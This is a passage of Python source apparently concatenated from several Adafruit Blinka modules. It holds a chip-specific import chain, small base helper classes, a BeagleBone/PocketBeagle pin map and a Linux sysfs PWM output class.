    from adafruit_blinka.microcontroller.tegra.t234 import *
elif chip_id == ap_chip.S905:
    from adafruit_blinka.microcontroller.amlogic.s905 import *
elif chip_id == ap_chip.S905X:
    from adafruit_blinka.microcontroller.amlogic.s905x import *
elif chip_id == ap_chip.S905X3:
    from adafruit_blinka.microcontroller.amlogic.s905x3 import *
elif chip_id == ap_chip.S905Y2:
    from adafruit_blinka.microcontroller.amlogic.s905y2 import *
elif chip_id == ap_chip.S922X:
    from adafruit_blinka.microcontroller.amlogic.s922x import *
elif chip_id == ap_chip.A311D:
    from adafruit_blinka.microcontroller.amlogic.a311d import *
elif chip_id == ap_chip.EXYNOS5422:
    from adafruit_blinka.microcontroller.samsung.exynos5422 import *
elif chip_id == ap_chip.APQ8016:
    from adafruit_blinka.microcontroller.snapdragon.apq8016 import *
elif chip_id == ap_chip.A64:
    from adafruit_blinka.microcontroller.allwinner.a64 import *
elif chip_id == ap_chip.A33:
    from adafruit_blinka.microcontroller.allwinner.a33 import *
elif chip_id == ap_chip.RK3308:
    from adafruit_blinka.microcontroller.rockchip.rk3308 import *
elif chip_id == ap_chip.RK3399:
    from adafruit_blinka.microcontroller.rockchip.rk3399 import *
elif chip_id == ap_chip.RK3399_T:
    from adafruit_blinka.microcontroller.rockchip.rk3399 import *
elif chip_id == ap_chip.RK3588:
    from adafruit_blinka.microcontroller.rockchip.rk3588 import *
elif chip_id == ap_chip.RK3328:
    from adafruit_blinka.microcontroller.rockchip.rk3328 import *
elif chip_id == ap_chip.RK3566:
    from adafruit_blinka.microcontroller.rockchip.rk3566 import *
elif chip_id == ap_chip.RK3568:
    from adafruit_blinka.microcontroller.rockchip.rk3568 import *
elif chip_id == ap_chip.H3:
    from adafruit_blinka.microcontroller.allwinner.h3 import *
# Fix: a second, unreachable `elif chip_id == ap_chip.H5` branch was removed
# here; H5 is already handled earlier in this chain.
elif chip_id == ap_chip.IMX8MX:
    from adafruit_blinka.microcontroller.nxp_imx8m import *
elif chip_id == ap_chip.IMX6ULL:
    from adafruit_blinka.microcontroller.nxp_imx6ull import *
elif chip_id == ap_chip.HFU540:
    from adafruit_blinka.microcontroller.hfu540 import *
elif chip_id == ap_chip.BINHO:
    from adafruit_blinka.microcontroller.nova import *
elif chip_id == ap_chip.LPC4330:
    from adafruit_blinka.microcontroller.nxp_lpc4330 import *
elif chip_id == ap_chip.MCP2221:
    from adafruit_blinka.microcontroller.mcp2221 import *
elif chip_id == ap_chip.MIPS24KC:
    from adafruit_blinka.microcontroller.atheros.ar9331 import *
elif chip_id == ap_chip.MIPS24KEC:
    from adafruit_blinka.microcontroller.mips24kec import *
elif chip_id == ap_chip.FT232H:
    from adafruit_blinka.microcontroller.ftdi_mpsse.ft232h import *
elif chip_id == ap_chip.FT2232H:
    from adafruit_blinka.microcontroller.ftdi_mpsse.ft2232h import *
elif chip_id == ap_chip.PENTIUM_N3710:
    from adafruit_blinka.microcontroller.pentium.n3710 import *
elif chip_id == ap_chip.ATOM_J4105:
    from adafruit_blinka.microcontroller.pentium.j4105 import *
elif chip_id == ap_chip.STM32MP157:
    from adafruit_blinka.microcontroller.stm32.stm32mp157 import *
elif chip_id == ap_chip.MT8167:
    from adafruit_blinka.microcontroller.mt8167 import *
elif chip_id == ap_chip.RP2040_U2IF:
    from adafruit_blinka.microcontroller.rp2040_u2if import *
elif chip_id == ap_chip.D1_RISCV:
    from adafruit_blinka.microcontroller.allwinner.D1 import *
elif chip_id == ap_chip.GENERIC_X86:
    print("WARNING: GENERIC_X86 is not fully supported. Some features may not work.")
elif chip_id is None:
    print(
        "WARNING: chip_id == None is not fully supported. Some features may not work."
    )
elif "sphinx" in sys.modules:
    # Building documentation: no hardware present, skip chip selection.
    pass
else:
    raise NotImplementedError("Microcontroller not supported:", chip_id)
class Enum:
    """
    Object supporting CircuitPython-style of static symbols
    as seen with Direction.OUTPUT, Pull.UP
    """

    def __repr__(self):
        """
        Assumes instance will be found as attribute of own class.
        Returns dot-subscripted path to instance
        (assuming absolute import of containing package)
        """
        cls = type(self)
        for key in dir(cls):
            if getattr(cls, key) is self:
                return "{}.{}.{}".format(cls.__module__, cls.__qualname__, key)
        # Fall back to the default object repr. Calling repr(self) here
        # would re-enter this method and recurse forever for an instance
        # that is not bound as a class attribute.
        return super().__repr__()

    @classmethod
    def iteritems(cls):
        """
        Inspects attributes of the class for instances of the class
        and returns as key,value pairs mirroring dict#iteritems
        """
        for key in dir(cls):
            val = getattr(cls, key)
            # The attribute *value* must be an instance of this Enum class.
            # (Arguments were previously reversed, which raised TypeError.)
            if isinstance(val, cls):
                yield (key, val)
class ContextManaged:
    """An object that automatically deinitializes hardware with a context manager."""

    def __enter__(self):
        # Entering the context hands back the object itself.
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Release hardware on exit, whether or not an exception occurred.
        self.deinit()

    # pylint: disable=no-self-use
    def deinit(self):
        """Free any hardware used by the object."""
        # Base implementation holds no hardware; subclasses override this.
        return

    # pylint: enable=no-self-use
class Lockable(ContextManaged):
    """An object that must be locked to prevent collisions on a microcontroller resource."""

    _locked = False

    def try_lock(self):
        """Attempt to grab the lock. Return True on success, False if the lock is already taken."""
        if not self._locked:
            self._locked = True
            return True
        return False

    def unlock(self):
        """Release the lock so others may use the resource."""
        if not self._locked:
            raise ValueError("Not locked")
        self._locked = False
def patch_system():
    """Patch modules that may be different due to the platform."""
    # pylint: disable=import-outside-toplevel
    import sys
    from adafruit_blinka.agnostic import time as _time

    # pylint: enable=import-outside-toplevel
    # Replace CPython's time module with the platform-specific shim so
    # CircuitPython libraries see the expected API.
    sys.modules["time"] = _time
"""AM335x pin names"""
from Adafruit_BBIO import GPIO
class Pin:
    """Pins dont exist in CPython so...lets make our own!"""

    # Direction constants
    IN = 0
    OUT = 1
    # Logic levels
    LOW = 0
    HIGH = 1
    # Pull resistor options
    PULL_NONE = 0
    PULL_UP = 1
    PULL_DOWN = 2

    id = None
    _value = LOW
    _mode = IN

    def __init__(self, pin_name):
        self.id = pin_name

    def __repr__(self):
        return str(self.id)

    def __eq__(self, other):
        return self.id == other

    def init(self, mode=IN, pull=None):
        """Initialize the Pin"""
        if mode is not None:
            if mode not in (self.IN, self.OUT):
                raise RuntimeError("Invalid mode for pin: %s" % self.id)
            self._mode = mode
            GPIO.setup(self.id, GPIO.IN if mode == self.IN else GPIO.OUT)
        if pull is not None:
            # Pulls only make sense on inputs.
            if self._mode != self.IN:
                raise RuntimeError("Cannot set pull resistor on output")
            if pull == self.PULL_UP:
                GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_UP)
            elif pull == self.PULL_DOWN:
                GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
            else:
                raise RuntimeError("Invalid pull for pin: %s" % self.id)

    def value(self, val=None):
        """Set or return the Pin Value"""
        if val is None:
            return GPIO.input(self.id)
        if val in (self.LOW, self.HIGH):
            self._value = val
            GPIO.output(self.id, val)
            return None
        raise RuntimeError("Invalid value for pin")
# Board pin name -> Pin object table for PocketBeagle / BeagleBone Black.
# Commented-out entries are power, ground, USB, or analog-reference pins
# that cannot be used as GPIO.
# names in comments copied from
# https://github.com/adafruit/adafruit-beaglebone-io-python/blob/master/source/common.c#L73
# PocketBeagle
# P1_1 = SYS VIN # VIN_AC
P1_2 = Pin("P1_2") # GPIO2_23 - GPIO_87
P1_3 = Pin("P1_3") # USB1_VBUS_OUT - (silkscreen: USB1 V_EN)
P1_4 = Pin("P1_4") # GPIO2_25 - GPIO_89
# P1_5 = USB VBUS # USB1_VBUS_IN
P1_6 = Pin("P1_6") # SPI0_CS0 - GPIO_5
# P1_7 = USB VIN # VIN-USB
P1_8 = Pin("P1_8") # SPI0_SCLK - GPIO_2
# P1_9 = USB1 DN # USB1-DN
P1_10 = Pin("P1_10") # SPI0_D0 - GPIO_3
# P1_11 = USB1 DP # USB1-DP
P1_12 = Pin("P1_12") # SPI0_D1 - GPIO_4
# P1_13 = USB1 ID # USB1-ID
# P1_14 = SYS 3.3V # VOUT-3.3V
# P1_15 = SYS GND # GND
# P1_16 = SYS GND # GND
# P1_17 = AIN 1.8V REF- # VREFN
# P1_18 = AIN 1.8V REF+ # VREFP
P1_19 = Pin("P1_19") # AIN0
P1_20 = Pin("P1_20") # GPIO0_20 - GPIO_20
P1_21 = Pin("P1_21") # AIN1
# P1_22 = SYS GND # GND
P1_23 = Pin("P1_23") # AIN2
# P1_24 = SYS VOUT # VOUT-5V  (comment fixed: was mislabeled P1_22)
P1_25 = Pin("P1_25") # AIN3
P1_26 = Pin("P1_26") # I2C2_SDA - GPIO_12
P1_27 = Pin("P1_27") # AIN4
P1_28 = Pin("P1_28") # I2C2_SCL - GPIO_13
P1_29 = Pin("P1_29") # GPIO3_21 - GPIO_117
P1_30 = Pin("P1_30") # UART0_TXD - GPIO_43
P1_31 = Pin("P1_31") # GPIO3_18 - GPIO_114
P1_32 = Pin("P1_32") # UART0_RXD - GPIO_42
P1_33 = Pin("P1_33") # GPIO3_15 - GPIO_111
P1_34 = Pin("P1_34") # GPIO0_26 - GPIO_26
P1_35 = Pin("P1_35") # GPIO2_24 - GPIO_88
P1_36 = Pin("P1_36") # EHRPWM0A - GPIO_110
P2_1 = Pin("P2_1") # EHRPWM1A - GPIO_50
P2_2 = Pin("P2_2") # GPIO1_27 - GPIO_59
P2_3 = Pin("P2_3") # GPIO0_23 - GPIO_23
P2_4 = Pin("P2_4") # GPIO1_26 - GPIO_58
P2_5 = Pin("P2_5") # UART4_RXD - GPIO_30
P2_6 = Pin("P2_6") # GPIO1_25 - GPIO_57
P2_7 = Pin("P2_7") # UART4_TXD - GPIO_31
P2_8 = Pin("P2_8") # GPIO1_28 - GPIO_60
P2_9 = Pin("P2_9") # I2C1_SCL - GPIO_15
P2_10 = Pin("P2_10") # GPIO1_20 - GPIO_52
P2_11 = Pin("P2_11") # I2C1_SDA - GPIO_14
# P2_12 = SYS PWR BTN # POWER_BUTTON
# P2_13 = SYS VOUT # VOUT-5V
# P2_14 = BAT VIN # BAT-VIN
# P2_15 = SYS GND # GND
# P2_16 = BAT TEMP # BAT-TEMP
P2_17 = Pin("P2_17") # GPIO2_1 - GPIO_65
P2_18 = Pin("P2_18") # GPIO1_15 - GPIO_47
P2_19 = Pin("P2_19") # GPIO0_27 - GPIO_27
P2_20 = Pin("P2_20") # GPIO2_0 - GPIO_64
# P2_21 = SYS GND # GND
P2_22 = Pin("P2_22") # GPIO1_14 - GPIO_46
# P2_23 = SYS 3.3V # VOUT-3.3V
P2_24 = Pin("P2_24") # GPIO1_12 - GPIO_44
P2_25 = Pin("P2_25") # SPI1_D1 - GPIO_41
# P2_26 = SYS NRST # RESET#
P2_27 = Pin("P2_27") # SPI1_D0 - GPIO_40
P2_28 = Pin("P2_28") # GPIO3_20 - GPIO_116
P2_29 = Pin("P2_29") # SPI1_SCLK - GPIO_7
P2_30 = Pin("P2_30") # GPIO3_17 - GPIO_113
P2_31 = Pin("P2_31") # SPI1_CS1 - GPIO_19
P2_32 = Pin("P2_32") # GPIO3_16 - GPIO_112
P2_33 = Pin("P2_33") # GPIO1_13 - GPIO_45
P2_34 = Pin("P2_34") # GPIO3_19 - GPIO_115
P2_35 = Pin("P2_35") # GPIO2_22 - GPIO_86
P2_36 = Pin("P2_36") # AIN7
# BeagleBone Black
# P8_1 = DGND # DGND - GPIO_0
# P8_2 = DGND # DGND - GPIO_0
P8_3 = Pin("P8_3") # GPIO1_6 - GPIO_38
P8_4 = Pin("P8_4") # GPIO1_7 - GPIO_39
P8_5 = Pin("P8_5") # GPIO1_2 - GPIO_34
P8_6 = Pin("P8_6") # GPIO1_3 - GPIO_35
P8_7 = Pin("P8_7") # TIMER4 - GPIO_66
P8_8 = Pin("P8_8") # TIMER7 - GPIO_67
P8_9 = Pin("P8_9") # TIMER5 - GPIO_69
P8_10 = Pin("P8_10") # TIMER6 - GPIO_68
P8_11 = Pin("P8_11") # GPIO1_13 - GPIO_45
P8_12 = Pin("P8_12") # GPIO1_12 - GPIO_44
P8_13 = Pin("P8_13") # EHRPWM2B - GPIO_23
P8_14 = Pin("P8_14") # GPIO0_26 - GPIO_26
P8_15 = Pin("P8_15") # GPIO1_15 - GPIO_47
P8_16 = Pin("P8_16") # GPIO1_14 - GPIO_46
P8_17 = Pin("P8_17") # GPIO0_27 - GPIO_27
P8_18 = Pin("P8_18") # GPIO2_1 - GPIO_65
P8_19 = Pin("P8_19") # EHRPWM2A - GPIO_22
P8_20 = Pin("P8_20") # GPIO1_31 - GPIO_63
P8_21 = Pin("P8_21") # GPIO1_30 - GPIO_62
P8_22 = Pin("P8_22") # GPIO1_5 - GPIO_37
P8_23 = Pin("P8_23") # GPIO1_4 - GPIO_36
P8_24 = Pin("P8_24") # GPIO1_1 - GPIO_33
P8_25 = Pin("P8_25") # GPIO1_0 - GPIO_32
P8_26 = Pin("P8_26") # GPIO1_29 - GPIO_61
P8_27 = Pin("P8_27") # GPIO2_22 - GPIO_86
P8_28 = Pin("P8_28") # GPIO2_24 - GPIO_88
P8_29 = Pin("P8_29") # GPIO2_23 - GPIO_87
P8_30 = Pin("P8_30") # GPIO2_25 - GPIO_89
P8_31 = Pin("P8_31") # UART5_CTSN - GPIO_10
P8_32 = Pin("P8_32") # UART5_RTSN - GPIO_11
P8_33 = Pin("P8_33") # UART4_RTSN - GPIO_9
P8_34 = Pin("P8_34") # UART3_RTSN - GPIO_81
P8_35 = Pin("P8_35") # UART4_CTSN - GPIO_8
P8_36 = Pin("P8_36") # UART3_CTSN - GPIO_80
P8_37 = Pin("P8_37") # UART5_TXD - GPIO_78
P8_38 = Pin("P8_38") # UART5_RXD - GPIO_79
P8_39 = Pin("P8_39") # GPIO2_12 - GPIO_76
P8_40 = Pin("P8_40") # GPIO2_13 - GPIO_77
P8_41 = Pin("P8_41") # GPIO2_10 - GPIO_74
P8_42 = Pin("P8_42") # GPIO2_11 - GPIO_75
P8_43 = Pin("P8_43") # GPIO2_8 - GPIO_72
P8_44 = Pin("P8_44") # GPIO2_9 - GPIO_73
P8_45 = Pin("P8_45") # GPIO2_6 - GPIO_70
P8_46 = Pin("P8_46") # GPIO2_7 - GPIO_71
# P9_1 = DGND # DGND - GPIO_0
# P9_2 = DGND # DGND - GPIO_0
# P9_3 = VDD_3V3 # VDD_3V3 - GPIO_0
# P9_4 = VDD_3V3 # VDD_3V3 - GPIO_0
# P9_5 = VDD_5V # VDD_5V - GPIO_0
# P9_6 = VDD_5V # VDD_5V - GPIO_0
# P9_7 = SYS_5V # SYS_5V - GPIO_0
# P9_8 = SYS_5V # SYS_5V - GPIO_0
# P9_9 = PWR_BUT # PWR_BUT - GPIO_0
# P9_10 = SYS_RESETN # SYS_RESETn - GPIO_0
P9_11 = Pin("P9_11") # UART4_RXD - GPIO_30
P9_12 = Pin("P9_12") # GPIO1_28 - GPIO_60
P9_13 = Pin("P9_13") # UART4_TXD - GPIO_31
P9_14 = Pin("P9_14") # EHRPWM1A - GPIO_50
P9_15 = Pin("P9_15") # GPIO1_16 - GPIO_48
P9_16 = Pin("P9_16") # EHRPWM1B - GPIO_51
P9_17 = Pin("P9_17") # I2C1_SCL - GPIO_5
P9_18 = Pin("P9_18") # I2C1_SDA - GPIO_4
P9_19 = Pin("P9_19") # I2C2_SCL - GPIO_13
P9_20 = Pin("P9_20") # I2C2_SDA - GPIO_12
P9_21 = Pin("P9_21") # UART2_TXD - GPIO_3
P9_22 = Pin("P9_22") # UART2_RXD - GPIO_2
P9_23 = Pin("P9_23") # GPIO1_17 - GPIO_49
P9_24 = Pin("P9_24") # UART1_TXD - GPIO_15
P9_25 = Pin("P9_25") # GPIO3_21 - GPIO_117
P9_26 = Pin("P9_26") # UART1_RXD - GPIO_14
P9_27 = Pin("P9_27") # GPIO3_19 - GPIO_115
P9_28 = Pin("P9_28") # SPI1_CS0 - GPIO_113
P9_29 = Pin("P9_29") # SPI1_D0 - GPIO_111
P9_30 = Pin("P9_30") # SPI1_D1 - GPIO_112
P9_31 = Pin("P9_31") # SPI1_SCLK - GPIO_110
# P9_32 = VDD_ADC # VDD_ADC - GPIO_0
# P9_33 = AIN4 # AIN4 - GPIO_0
# P9_34 = GNDA_ADC # GNDA_ADC - GPIO_0
# P9_35 = AIN6 # AIN6 - GPIO_0
# P9_36 = AIN5 # AIN5 - GPIO_0
# P9_37 = AIN2 # AIN2 - GPIO_0
# P9_38 = AIN3 # AIN3 - GPIO_0
# P9_39 = AIN0 # AIN0 - GPIO_0
# P9_40 = AIN1 # AIN1 - GPIO_0
P9_41 = Pin("P9_41") # CLKOUT2 - GPIO_20
P9_42 = Pin("P9_42") # GPIO0_7 - GPIO_7
# P9_43 = DGND # DGND - GPIO_0
# P9_44 = DGND # DGND - GPIO_0
# P9_45 = DGND # DGND - GPIO_0
# P9_46 = DGND # DGND - GPIO_0
##########################################
# common to all beagles
USR0 = Pin("USR0") # USR0 - GPIO_53
USR1 = Pin("USR1") # USR1 - GPIO_54
USR2 = Pin("USR2") # USR2 - GPIO_55
USR3 = Pin("USR3") # USR3 - GPIO_56
##########################################
# specials
# analog input
AIN0 = Pin("AIN0")
AIN1 = Pin("AIN1")
AIN2 = Pin("AIN2")
AIN3 = Pin("AIN3")
AIN4 = Pin("AIN4")
AIN5 = Pin("AIN5")
AIN6 = Pin("AIN6")
AIN7 = Pin("AIN7")
# PWM
EHRPWM0A = Pin("EHRPWM0A")
EHRPWM0B = Pin("EHRPWM0B")
EHRPWM1A = Pin("EHRPWM1A")
EHRPWM1B = Pin("EHRPWM1B")
EHRPWM2A = Pin("EHRPWM2A")
EHRPWM2B = Pin("EHRPWM2B")
ECAPPWM0 = Pin("ECAPPWM0")
ECAPPWM2 = Pin("ECAPPWM2")
TIMER4 = Pin("TIMER4")
TIMER5 = Pin("TIMER5")
TIMER6 = Pin("TIMER6")
TIMER7 = Pin("TIMER7")
# I2C1
I2C1_SDA = Pin("I2C1_SDA")
I2C1_SCL = Pin("I2C1_SCL")
# I2C2
I2C2_SDA = Pin("I2C2_SDA")
I2C2_SCL = Pin("I2C2_SCL")
# SPI0
SPI0_CS0 = Pin("SPI0_CS0")
SPI0_SCLK = Pin("SPI0_SCLK")
SPI0_D1 = Pin("SPI0_D1")
SPI0_D0 = Pin("SPI0_D0")
# SPI1
SPI1_CS0 = Pin("SPI1_CS0")
SPI1_CS1 = Pin("SPI1_CS1")
SPI1_SCLK = Pin("SPI1_SCLK")
SPI1_D1 = Pin("SPI1_D1")
SPI1_D0 = Pin("SPI1_D0")
# UART0
UART0_TXD = Pin("UART0_TXD")
UART0_RXD = Pin("UART0_RXD")
# UART1
UART1_TXD = Pin("UART1_TXD")
UART1_RXD = Pin("UART1_RXD")
UART1_RTSn = Pin("UART1_RTSn")
UART1_CTSn = Pin("UART1_CTSn")
# UART2
UART2_TXD = Pin("UART2_TXD")
UART2_RXD = Pin("UART2_RXD")
# UART3
UART3_TXD = Pin("UART3_TXD")
UART3_RXD = Pin("UART3_RXD")
UART3_RTSn = Pin("UART3_RTSn")
UART3_CTSn = Pin("UART3_CTSn")
# UART4
UART4_TXD = Pin("UART4_TXD")
UART4_RXD = Pin("UART4_RXD")
UART4_RTSn = Pin("UART4_RTSn")
UART4_CTSn = Pin("UART4_CTSn")
# UART5
UART5_TXD = Pin("UART5_TXD")
UART5_RXD = Pin("UART5_RXD")
UART5_RTSn = Pin("UART5_RTSn")
UART5_CTSn = Pin("UART5_CTSn")
# ordered as spiId, sckId, mosiId, misoId
spiPorts = (
    (0, SPI0_SCLK, SPI0_D1, SPI0_D0),
    (1, SPI1_SCLK, SPI1_D1, SPI1_D0),
)
# ordered as uartId, txId, rxId
# NOTE(review): all entries are commented out, so busio UART lookup finds no
# ports on this board -- confirm whether this is intentional.
uartPorts = (
    # (0, UART0_TXD, UART0_RXD),
    # (1, UART1_TXD, UART1_RXD),
    # (2, UART2_TXD, UART2_RXD),
    # (4, UART4_TXD, UART4_RXD),
    # (5, UART5_TXD, UART5_RXD),
)
# ordered as i2cId, SCL, SDA
i2cPorts = (
    (1, I2C1_SCL, I2C1_SDA),
    (2, I2C2_SCL, I2C2_SDA),
)
PWM1 = P1_36
PWM2 = P1_33
PWM3 = P2_1
PWM4 = P2_3
# ordered as ((pwm chip, pwm channel), Pin)
pwmOuts = (((0, 0), PWM1), ((0, 1), PWM2), ((2, 0), PWM3), ((4, 1), PWM4))
import os

try:
    from microcontroller.pin import pwmOuts
except ImportError as err:
    # Chain from the caught exception instance (not the ImportError class)
    # so the original import failure is preserved in the traceback.
    raise RuntimeError("No PWM outputs defined for this board") from err
class PWMError(IOError):
    """Base class for PWM errors."""
class PWMOut:
    """Pulse Width Modulation Output Class

    Drives one PWM pin through the Linux sysfs PWM interface
    (/sys/class/pwm/pwmchip<chip>/pwm-<chip>:<channel>/...).
    """

    # Sysfs paths
    _sysfs_path = "/sys/class/pwm/"
    _channel_path = "pwmchip{}"

    # Channel paths
    _export_path = "export"
    _unexport_path = "unexport"
    _pin_path = "pwm-{}:{}"

    # Pin attribute paths
    _pin_period_path = "period"
    _pin_duty_cycle_path = "duty_cycle"
    _pin_polarity_path = "polarity"
    _pin_enable_path = "enable"

    def __init__(self, pin, *, frequency=500, duty_cycle=0, variable_frequency=False):
        """Instantiate a PWM object and open the sysfs PWM corresponding to the
        specified channel and pin.

        Args:
            pin (Pin): CircuitPython Pin object to output to
            duty_cycle (int) : The fraction of each pulse which is high. 16-bit
            frequency (int) : target frequency in Hertz (32-bit)
            variable_frequency (bool) : True if the frequency will change over time

        Returns:
            PWMOut: PWMOut object.

        Raises:
            PWMError: if an I/O or OS error occurs.
            TypeError: if `channel` or `pin` types are invalid.
            ValueError: if PWM channel does not exist.

        """
        self._pwmpin = None
        self._channel = None
        self._period = 0
        self._open(pin, duty_cycle, frequency, variable_frequency)

    def __del__(self):
        self.deinit()

    def __enter__(self):
        return self

    def __exit__(self, t, value, traceback):
        self.deinit()

    def _open(self, pin, duty=0, freq=500, variable_frequency=False):
        self._channel = None
        # Map the CircuitPython pin to a (chip, channel) pair from the
        # board-specific pwmOuts table; the last matching entry wins.
        for pwmpair in pwmOuts:
            if pwmpair[1] == pin:
                self._channel = pwmpair[0][0]
                self._pwmpin = pwmpair[0][1]
        self._pin = pin
        if self._channel is None:
            raise RuntimeError("No PWM channel found for this Pin")
        if variable_frequency:
            print("Variable Frequency is not supported, continuing without it...")
        channel_path = os.path.join(
            self._sysfs_path, self._channel_path.format(self._channel)
        )
        if not os.path.isdir(channel_path):
            raise ValueError(
                "PWM channel does not exist, check that the required modules are loaded."
            )
        pin_path = os.path.join(
            channel_path, self._pin_path.format(self._channel, self._pwmpin)
        )
        if not os.path.isdir(pin_path):
            # Pin not yet exported: ask the kernel to create the pwm-N:M node.
            try:
                with open(
                    os.path.join(channel_path, self._export_path), "w", encoding="utf-8"
                ) as f_export:
                    f_export.write("%d\n" % self._pwmpin)
            except IOError as e:
                # Chain from the caught instance, not the IOError class.
                raise PWMError(e.errno, "Exporting PWM pin: " + e.strerror) from e
        # Look up the period, for fast duty cycle updates
        self._period = self._get_period()
        # set frequency
        self.frequency = freq
        # set duty
        self.duty_cycle = duty
        self._set_enabled(True)

    def deinit(self):
        """Deinit the sysfs PWM."""
        # pylint: disable=broad-except
        try:
            channel_path = os.path.join(
                self._sysfs_path, self._channel_path.format(self._channel)
            )
            if self._channel is not None:
                # self.duty_cycle = 0
                self._set_enabled(False)  # make to disable before unexport
                try:
                    # unexport_path = os.path.join(channel_path, self._unexport_path)
                    with open(
                        os.path.join(channel_path, self._unexport_path),
                        "w",
                        encoding="utf-8",
                    ) as f_unexport:
                        f_unexport.write("%d\n" % self._pwmpin)
                except IOError as e:
                    # Chain from the caught instance, not the IOError class.
                    raise PWMError(
                        e.errno, "Unexporting PWM pin: " + e.strerror
                    ) from e
        except Exception as e:
            # due to a race condition for which I have not yet been
            # able to find the root cause, deinit() often fails
            # but it does not effect future usage of the pwm pin
            print(
                "warning: failed to deinitialize pwm pin {0}:{1} due to: {2}\n".format(
                    self._channel, self._pwmpin, type(e).__name__
                )
            )
        finally:
            self._channel = None
            self._pwmpin = None
        # pylint: enable=broad-except

    def _is_deinited(self):
        # Raise if this object was already released via deinit().
        if self._pwmpin is None:
            raise ValueError(
                "Object has been deinitialize and can no longer "
                "be used. Create a new object."
            )

    def _write_pin_attr(self, attr, value):
        # Make sure the pin is active
        self._is_deinited()
        path = os.path.join(
            self._sysfs_path,
            self._channel_path.format(self._channel),
            self._pin_path.format(self._channel, self._pwmpin),
            attr,
        )
        with open(path, "w", encoding="utf-8") as f_attr:
            f_attr.write(value + "\n")

    def _read_pin_attr(self, attr):
        # Make sure the pin is active
        self._is_deinited()
        path = os.path.join(
            self._sysfs_path,
            self._channel_path.format(self._channel),
            self._pin_path.format(self._channel, self._pwmpin),
            attr,
        )
        with open(path, "r", encoding="utf-8") as f_attr:
            return f_attr.read().strip()

    # Mutable properties

    def _get_period(self):
        period_ns = self._read_pin_attr(self._pin_period_path)
        try:
            period_ns = int(period_ns)
        except ValueError as e:
            raise PWMError(
                None, 'Unknown period value: "%s"' % period_ns
            ) from e
        # Convert period from nanoseconds to seconds
        period = period_ns / 1e9
        # Update our cached period
        self._period = period
        return period

    def _set_period(self, period):
        if not isinstance(period, (int, float)):
            raise TypeError("Invalid period type, should be int or float.")
        # Convert period from seconds to integer nanoseconds
        period_ns = int(period * 1e9)
        self._write_pin_attr(self._pin_period_path, "{}".format(period_ns))
        # Update our cached period
        self._period = float(period)

    period = property(_get_period, _set_period)
    """Get or set the PWM's output period in seconds.

    Raises:
        PWMError: if an I/O or OS error occurs.
        TypeError: if value type is not int or float.

    :type: int, float
    """

    def _get_duty_cycle(self):
        duty_cycle_ns = self._read_pin_attr(self._pin_duty_cycle_path)
        try:
            duty_cycle_ns = int(duty_cycle_ns)
        except ValueError as e:
            raise PWMError(
                None, 'Unknown duty cycle value: "%s"' % duty_cycle_ns
            ) from e
        # Convert duty cycle from nanoseconds to seconds
        duty_cycle = duty_cycle_ns / 1e9
        # Convert duty cycle to ratio from 0.0 to 1.0
        duty_cycle = duty_cycle / self._period
        # convert to 16-bit
        duty_cycle = int(duty_cycle * 65535)
        return duty_cycle

    def _set_duty_cycle(self, duty_cycle):
        if not isinstance(duty_cycle, (int, float)):
            raise TypeError("Invalid duty cycle type, should be int or float.")
        # convert from 16-bit
        duty_cycle /= 65535.0
        if not 0.0 <= duty_cycle <= 1.0:
            raise ValueError("Invalid duty cycle value, should be between 0.0 and 1.0.")
        # Convert duty cycle from ratio to seconds
        duty_cycle = duty_cycle * self._period
        # Convert duty cycle from seconds to integer nanoseconds
        duty_cycle_ns = int(duty_cycle * 1e9)
        self._write_pin_attr(self._pin_duty_cycle_path, "{}".format(duty_cycle_ns))

    duty_cycle = property(_get_duty_cycle, _set_duty_cycle)
    """Get or set the PWM's output duty cycle as a 16-bit value from 0 to 65535.

    Raises:
        PWMError: if an I/O or OS error occurs.
        TypeError: if value type is not int or float.
        ValueError: if value is out of bounds of 0.0 to 1.0.

    :type: int, float
    """

    def _get_frequency(self):
        return 1.0 / self._get_period()

    def _set_frequency(self, frequency):
        if not isinstance(frequency, (int, float)):
            raise TypeError("Invalid frequency type, should be int or float.")
        self._set_period(1.0 / frequency)

    frequency = property(_get_frequency, _set_frequency)
    """Get or set the PWM's output frequency in Hertz.

    Raises:
        PWMError: if an I/O or OS error occurs.
        TypeError: if value type is not int or float.

    :type: int, float
    """

    def _get_enabled(self):
        enabled = self._read_pin_attr(self._pin_enable_path)
        if enabled == "1":
            return True
        if enabled == "0":
            return False
        raise PWMError(None, 'Unknown enabled value: "%s"' % enabled)

    def _set_enabled(self, value):
        """Get or set the PWM's output enabled state.

        Raises:
            PWMError: if an I/O or OS error occurs.
            TypeError: if value type is not bool.

        :type: bool
        """
        if not isinstance(value, bool):
            # Message fixed: the check is for bool, not string.
            raise TypeError("Invalid enabled type, should be bool.")
        self._write_pin_attr(self._pin_enable_path, "1" if value else "0")

    # String representation

    def __str__(self):
        return "PWM%d, pin %s (freq=%f Hz, duty_cycle=%f%%)" % (
            self._channel,
            self._pin,
            self.frequency,
            self.duty_cycle * 100,
        )
"""Tegra T210 pin names"""
import atexit
from Jetson import GPIO
# Address pins by Tegra SoC signal name rather than board header numbering.
GPIO.setmode(GPIO.TEGRA_SOC)
GPIO.setwarnings(False)  # shh! -- silence Jetson.GPIO warnings
class Pin:
    """Pins dont exist in CPython so...lets make our own!"""

    # Direction constants
    IN = 0
    OUT = 1
    # Logic levels
    LOW = 0
    HIGH = 1
    # Pull resistor options
    PULL_NONE = 0
    PULL_UP = 1
    PULL_DOWN = 2

    id = None
    _value = LOW
    _mode = IN

    def __init__(self, bcm_number):
        self.id = bcm_number

    def __repr__(self):
        return str(self.id)

    def __eq__(self, other):
        return self.id == other

    def init(self, mode=IN, pull=None):
        """Initialize the Pin"""
        if mode is not None:
            if mode not in (self.IN, self.OUT):
                raise RuntimeError("Invalid mode for pin: %s" % self.id)
            self._mode = mode
            GPIO.setup(self.id, GPIO.IN if mode == self.IN else GPIO.OUT)
        if pull is not None:
            # Pulls only make sense on inputs.
            if self._mode != self.IN:
                raise RuntimeError("Cannot set pull resistor on output")
            if pull == self.PULL_UP:
                GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_UP)
            elif pull == self.PULL_DOWN:
                GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
            else:
                raise RuntimeError("Invalid pull for pin: %s" % self.id)

    def value(self, val=None):
        """Set or return the Pin Value"""
        if val is None:
            return GPIO.input(self.id)
        if val in (self.LOW, self.HIGH):
            self._value = val
